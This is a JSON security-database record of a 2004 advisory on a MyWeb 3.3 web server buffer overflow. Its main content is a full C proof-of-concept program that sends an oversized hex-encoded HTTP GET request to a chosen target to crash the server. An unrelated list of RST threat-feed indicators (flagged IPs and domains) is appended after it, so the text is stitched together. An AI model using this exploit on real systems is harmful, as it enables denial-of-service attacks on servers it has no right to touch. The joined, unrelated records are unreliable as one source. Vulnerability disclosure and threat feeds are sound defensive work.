{"id": "SECURITYVULNS:DOC:6192", "bulletinFamily": "software", "title": "[NT] MyWeb Buffer Overflow", "description": "The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web\r\nsite: http://www.securiteam.com\r\n- - promotion\r\n\r\nThe SecuriTeam alerts list - Free, Accurate, Independent.\r\n\r\nGet your security news from a reliable source.\r\nhttp://www.securiteam.com/mailinglist.html \r\n\r\n- - - - - - - - -\r\n\r\n\r\n\r\n MyWeb Buffer Overflow\r\n------------------------------------------------------------------------\r\n\r\n\r\nSUMMARY\r\n\r\n <http://www.xuebrothers.net/myweb/myweb.htm> MyWeb is "a portable web \r\nserver for home use. You can start your web site on your PC with in a few \r\nseconds. MyWeb is the ideal tool for sharing photos, mp3s, as well as \r\nrandom files and folders with friends and relatives through HTTP".\r\n\r\nA specifically crafted HTTP GET request that contains over 4096 bytes of \r\ndata will cause the HTTP server to crash.\r\n\r\nDETAILS\r\n\r\nVulnerable Systems:\r\n * MyWeb version 3.3 and prior\r\n\r\nExploit:\r\n/****************************/\r\n PoC to crash the server\r\n/****************************/\r\n\r\n/* MyWeb 3.3 Buffer Overflow\r\n vendor:\r\n http://www.xuebrothers.net/myweb/myweb.htm\r\n \r\n coded and discovered by:\r\n badpack3t <badpack3t@security-protocols.com>\r\n for .:sp research labs:.\r\n www.security-protocols.com\r\n 5.6.2004\r\n \r\n usage: \r\n sp-myweb3.3 <targetip> [targetport] (default is 80)\r\n\r\n This PoC will only DoS the server to verify if it is vulnerable.\r\n */\r\n\r\n#include <winsock2.h>\r\n#include <stdio.h>\r\n\r\n#pragma comment(lib, "ws2_32.lib")\r\n\r\nchar exploit[] = \r\n\r\n"\x47\x45\x54\x20\x2f\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x01\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"\r\n"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x2e"\r\n"\x68\x74\x6d\x6c\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d\x0a\x52"\r\n"\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6c"\r\n"\x6f\x63\x61\x6c\x68\x6f\x73\x74\x2f\x66\x75\x78\x30\x72\x0d\x0a"\r\n"\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70"\r\n"\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d"\r\n"\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x0d"\r\n"\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65"\r\n"\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x55\x73\x65\x72\x2d\x41\x67"\r\n"\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x37"\r\n"\x36\x20\x5b\x65\x6e\x5d\x20\x28\x58\x31\x31\x3b\x20\x55\x3b\x20"\r\n"\x4c\x69\x6e\x75\x78\x20\x32\x2e\x34\x2e\x32\x2d\x32\x20\x69\x36"\r\n"\x38\x36\x29\x0d\x0a\x56\x61\x72\x69\x61\x62\x6c\x65\x3a\x20\x72"\r\n"\x65\x73\x75\x6c\x74\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x6c\x6f\x63"\r\n"\x61\x6c\x68\x6f\x73\x74\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d"\r\n"\x6c\x65\x6e\x67\x74\x68\x3a\x20\x35\x31\x33\x0d\x0a\x41\x63\x63"\r\n"\x65\x70\x74\x3a\x20\x69\x6d\x61\x67\x65\x2f\x67\x69\x66\x2c\x20"\r\n"\x69\x6d\x61\x67\x65\x2f\x78\x2d\x78\x62\x69\x74\x6d\x61\x70\x2c"\r\n"\x20\x69\x6d\x61\x67\x65\x2f\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61"\r\n"\x67\x65\x2f\x70\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67\x65\x2f"\r\n"\x70\x6e\x67\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f"\r\n"\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x0d\x0a\x41\x63\x63\x65"\r\n"\x70\x74\x2d\x43\x68\x61\x72\x73\x65\x74\x3a\x20\x69\x73\x6f\x2d"\r\n"\x38\x38\x35\x39\x2d\x31\x2c\x2a\x2c\x75\x74\x66\x2d\x38\x0d\x0a"\r\n"\x0d\x0a\x77\x68\x61\x74\x79\x6f\x75\x74\x79\x70\x65\x64\x3d\x3f"\r\n"\x0d\x0a";\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n WSADATA wsaData;\r\n WORD wVersionRequested;\r\n struct hostent *pTarget;\r\n struct sockaddr_in sock;\r\n char *target;\r\n int port,bufsize;\r\n SOCKET mysocket;\r\n \r\n if (argc < 2)\r\n {\r\n printf("MyWeb 3.3 Buffer Overflow by badpack3t\r\n \r\n<badpack3t@security-protocols.com>\r\n\r\n", argv[0]);\r\n printf("Usage:\r\n %s <targetip> [targetport] (default is 80)\r\n\r\n", \r\nargv[0]);\r\n printf("www.security-protocols.com\r\n\r\n", argv[0]);\r\n exit(1);\r\n }\r\n\r\n wVersionRequested = MAKEWORD(1, 1);\r\n if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;\r\n\r\n target = argv[1];\r\n port = 80;\r\n\r\n if (argc >= 3) port = atoi(argv[2]);\r\n bufsize = 1024;\r\n if (argc >= 4) bufsize = atoi(argv[3]);\r\n\r\n mysocket = socket(AF_INET, SOCK_STREAM, 0);\r\n if(mysocket==INVALID_SOCKET)\r\n { \r\n printf("Socket error!\r\n");\r\n exit(1);\r\n }\r\n\r\n printf("Resolving Hostnames...\n");\r\n if ((pTarget = gethostbyname(target)) == NULL)\r\n {\r\n printf("Resolve of %s failed\n", argv[1]);\r\n exit(1);\r\n }\r\n\r\n memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);\r\n sock.sin_family = AF_INET;\r\n sock.sin_port = htons((USHORT)port);\r\n\r\n printf("Connecting...\n");\r\n if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))\r\n {\r\n printf("Couldn't connect to host.\n");\r\n exit(1);\r\n }\r\n\r\n printf("Connected!...\n");\r\n printf("Sending Payload...\n");\r\n if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)\r\n {\r\n printf("Error Sending the Exploit Payload\r\n");\r\n closesocket(mysocket);\r\n exit(1);\r\n }\r\n\r\n printf("Payload has been sent! Check if the webserver is dead y0!\r\n");\r\n closesocket(mysocket);\r\n WSACleanup();\r\n return 0;\r\n}\r\n\r\n\r\nADDITIONAL INFORMATION\r\n\r\nThe information has been provided by \r\n<mailto:badpack3t@security-protocols.com> badpack3t.\r\n\r\nThe original article can be found at: \r\n<http://fux0r.phathookups.com/advisory/sp-x11-advisory.txt> \r\nhttp://fux0r.phathookups.com/advisory/sp-x11-advisory.txt\r\n\r\n\r\n\r\n======================================== \r\n\r\n\r\nThis bulletin is sent to members of the SecuriTeam mailing list. \r\nTo unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com \r\nIn order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com \r\n\r\n\r\n==================== \r\n==================== \r\n\r\nDISCLAIMER: \r\nThe information in this bulletin is provided "AS IS" without warranty of any kind. \r\nIn no event shall we be liable for any damages whatsoever including direct, indirect, incidental,\r\nconsequential, loss of business profits or special damages. \r\n\r\n\r\n\r\n", "published": "2004-05-11T00:00:00", "modified": "2004-05-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6192", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:09", "edition": 1, "viewCount": 0, "enchantments": {"score": {"value": 2.6, "vector": "NONE", "modified": "2018-08-31T11:10:09", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["EULEROS_SA-2020-1498.NASL", "EULEROS_SA-2020-1457.NASL", "EULEROS_SA-2020-1496.NASL", "EULEROS_SA-2020-1477.NASL", "EULEROS_SA-2020-1491.NASL", "EULEROS_SA-2020-1494.NASL", "EULEROS_SA-2020-1483.NASL", "EULEROS_SA-2020-1489.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201494", "OPENVAS:1361412562311220201431", "OPENVAS:1361412562311220201489", "OPENVAS:1361412562311220201457", "OPENVAS:1361412562311220201477", "OPENVAS:1361412562311220201400", "OPENVAS:1361412562311220201491", "OPENVAS:1361412562311220201476", "OPENVAS:1361412562311220201430", "OPENVAS:1361412562311220201473"]}], "modified": "2018-08-31T11:10:09", "rev": 2}, "vulnersScore": 2.6}, "affectedSoftware": []}

{"rst": [{"lastseen": "2021-01-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **206[.]253.224.74** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **20**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-23T03:00:00.\n IOC tags: **generic**.\nASN 15293: (First IP 206.253.224.0, Last IP 206.253.225.255).\nASN Name \"ASNISSATL\" and Organisation \"Internet Security Systems\".\nASN hosts 7 domains.\nGEO IP information: City \"\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:AF073DA3-6192-360F-9B2E-FF1AAB6CA7DA", "href": "", "published": "2021-01-24T00:00:00", "title": "RST Threat feed. IOC: 206.253.224.74", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **7k8b[.]com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **20**.\n First seen: 2019-12-15T03:00:00, Last seen: 2021-01-23T03:00:00.\n IOC tags: **spam**.\nWhois:\n Created: 2020-12-09 20:04:35, \n Registrar: ALIBABACOM SINGAPORE ECOMMERCE PRIVATE LIMITED, \n Registrant: unknown.\nIOC could be a **False Positive** (Domain not resolved, but Whois records found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-12-15T00:00:00", "id": "RST:EE06B74D-6192-3AEE-9D9B-AF9CEA4B0E3D", "href": "", "published": "2021-01-24T00:00:00", "title": "RST Threat feed. IOC: 7k8b.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **l2win[.]ucoz.ru** in [RST Threat Feed](https://rstcloud.net/profeed) with score **22**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-23T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 195[.]216.243.12\nWhois:\n Created: 2005-08-20 20:00:00, \n Registrar: RUCENTERRU, \n Registrant: Compubyte Limited.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:B29EB95D-6192-3FA9-A218-B270DEE02E97", "href": "", "published": "2021-01-24T00:00:00", "title": "RST Threat feed. IOC: l2win.ucoz.ru", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **malluhero[.]tk** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-23T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:B284ABE3-6192-38B2-B274-99CB48E52CAB", "href": "", "published": "2021-01-24T00:00:00", "title": "RST Threat feed. IOC: malluhero.tk", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **pushjusbr[.]email** in [RST Threat Feed](https://rstcloud.net/profeed) with score **9**.\n First seen: 2020-09-03T03:00:00, Last seen: 2021-01-23T03:00:00.\n IOC tags: **spam**.\nDomain has DNS A records: 104[.]18.34.98,172.67.144.147,104.18.35.98\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-09-03T00:00:00", "id": "RST:4D97A79E-6192-3E6E-9A17-89DE138E4260", "href": "", "published": "2021-01-24T00:00:00", "title": "RST Threat feed. IOC: pushjusbr.email", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **wwwhg564[.]com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-23T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:B9339712-6192-394A-BAB2-A334AF30B237", "href": "", "published": "2021-01-24T00:00:00", "title": "RST Threat feed. IOC: wwwhg564.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **198[.]71.239.19** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **10**.\n First seen: 2020-06-27T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **scan, generic**.\nASN 26496: (First IP 198.71.208.0, Last IP 198.71.255.255).\nASN Name \"AS26496GODADDYCOMLLC\" and Organisation \"GoDaddycom LLC\".\nThis IP is a part of \"**godaddy**\" address pools.\nASN hosts 18722897 domains.\nGEO IP information: City \"Ashburn\", Country \"United States\".\nIOC could be a **False Positive** (Cloud provider IP).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-06-27T00:00:00", "id": "RST:82C5C895-6192-321E-8A0B-2A242A6357C1", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: 198.71.239.19", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **www[.]kamakshisikha.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **20**.\n First seen: 2020-07-06T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **malware**.\nWhois:\n Created: 2017-09-10 14:46:05, \n Registrar: BigRock Solutions Ltd, \n Registrant: unknown.\nIOC could be a **False Positive** (Domain not resolved, but Whois records found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-07-06T00:00:00", "id": "RST:9825B460-6192-3A46-B7D7-C2BFDC98D6F2", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: www.kamakshisikha.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **cerberhhyed5frqa[.]werti4.win** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2019-12-13T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-12-13T00:00:00", "id": "RST:35BAF1FC-6192-37D8-8D6A-7FE4C382502C", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: cerberhhyed5frqa.werti4.win", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-19T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **71[.]217.72.31** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **42**.\n First seen: 2021-01-12T03:00:00, Last seen: 2021-01-19T03:00:00.\n IOC tags: **shellprobe**.\nASN 209: (First IP 71.216.248.0, Last IP 71.223.255.255).\nASN Name \"CENTURYLINKUSLEGACYQWEST\" and Organisation \"Qwest Communications Company LLC\".\nASN hosts 73950 domains.\nGEO IP information: City \"Bunnlevel\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-12T00:00:00", "id": "RST:5C8834EA-6192-3107-97A1-BFF9E020698B", "href": "", "published": "2021-01-20T00:00:00", "title": "RST Threat feed. IOC: 71.217.72.31", "type": "rst", "cvss": {}}]}